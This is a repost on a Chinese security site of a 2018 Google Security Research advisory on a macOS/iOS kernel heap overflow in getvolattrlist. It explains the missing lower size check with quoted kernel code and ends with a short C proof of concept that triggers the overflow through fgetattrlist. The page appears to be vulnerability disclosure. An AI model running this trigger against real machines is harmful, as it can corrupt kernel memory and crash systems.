首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvol
来源:Google Security Research 作者:Google 发布时间:2018-06-11  
/*
getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall.
 
When allocating a kernel buffer to serialize the attr list to there's the following comment:
 
  /*
   * Allocate a target buffer for attribute results.
   * Note that since we won't ever copy out more than the caller requested,
   * we never need to allocate more than they offer.
   */
  ab.allocated = ulmin(bufferSize, fixedsize + varsize);
  if (ab.allocated > ATTR_MAX_BUFFER) {
    error = ENOMEM;
    VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER);
    goto out;
  }
  MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK);
 
The problem is that the code doesn't then correctly handle the case when the user supplied buffer size
is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code:
 
  /* Return attribute set output if requested. */
  if (return_valid) {
    ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS;
    if (pack_invalid) {
      /* Only report the attributes that are valid */
      ab.actual.commonattr &= ab.valid.commonattr;
      ab.actual.volattr &= ab.valid.volattr;
    }
    bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual));
  }
 
There's no check that the allocated buffer is big enough to hold at least that.
 
Tested on MacOS 10.13.4 (17E199)
*/
 
// ianbeer
#if 0
MacOS/iOS kernel heap overflow due to lack of lower size check in getvolattrlist
 
getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall.
 
When allocating a kernel buffer to serialize the attr list to there's the following comment:
 
    /*
     * Allocate a target buffer for attribute results.
     * Note that since we won't ever copy out more than the caller requested,
     * we never need to allocate more than they offer.
     */
    ab.allocated = ulmin(bufferSize, fixedsize + varsize);
    if (ab.allocated > ATTR_MAX_BUFFER) {
        error = ENOMEM;
        VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER);
        goto out;
    }
    MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK);
 
The problem is that the code doesn't then correctly handle the case when the user supplied buffer size
is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code:
 
    /* Return attribute set output if requested. */
    if (return_valid) {
        ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS;
        if (pack_invalid) {
            /* Only report the attributes that are valid */
            ab.actual.commonattr &= ab.valid.commonattr;
            ab.actual.volattr &= ab.valid.volattr;
        }
        bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual));
    }
 
There's no check that the allocated buffer is big enough to hold at least that.
 
Tested on MacOS 10.13.4 (17E199)
 
#endif
 
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/attr.h>
 
int main() {
  int fd = open("/", O_RDONLY);
  if (fd == -1) {
    perror("unable to open fs root\n");
    return 0;
  }
 
  struct attrlist al = {0};
 
  al.bitmapcount = ATTR_BIT_MAP_COUNT;
  al.volattr = 0xfff;
  al.commonattr = ATTR_CMN_RETURNED_ATTRS;
 
  size_t attrBufSize = 16;
  void* attrBuf = malloc(attrBufSize);
  int options = 0;
 
  int err = fgetattrlist(fd, &al, attrBuf, attrBufSize, options);
  printf("err: %d\n", err);
  return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Apple macOS Kernel - Use-After
·TrendMicro OfficeScan XG 11.0
·PHP 7.2.2 - 'php_stream_url_wr
·WebKitGTK+ < 2.21.3 - Crash (P
·10-Strike Network Scanner 3.0
·10-Strike Network Inventory Ex
·10-Strike Network Inventory Ex
·WebKit - not_number defineProp
·Clone2GO Video converter 2.8.2
·Linux Kernel < 4.16.11 - 'ext4
·Microsoft Windows - UAC Protec
·CyberArk < 10 - Memory Disclos
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved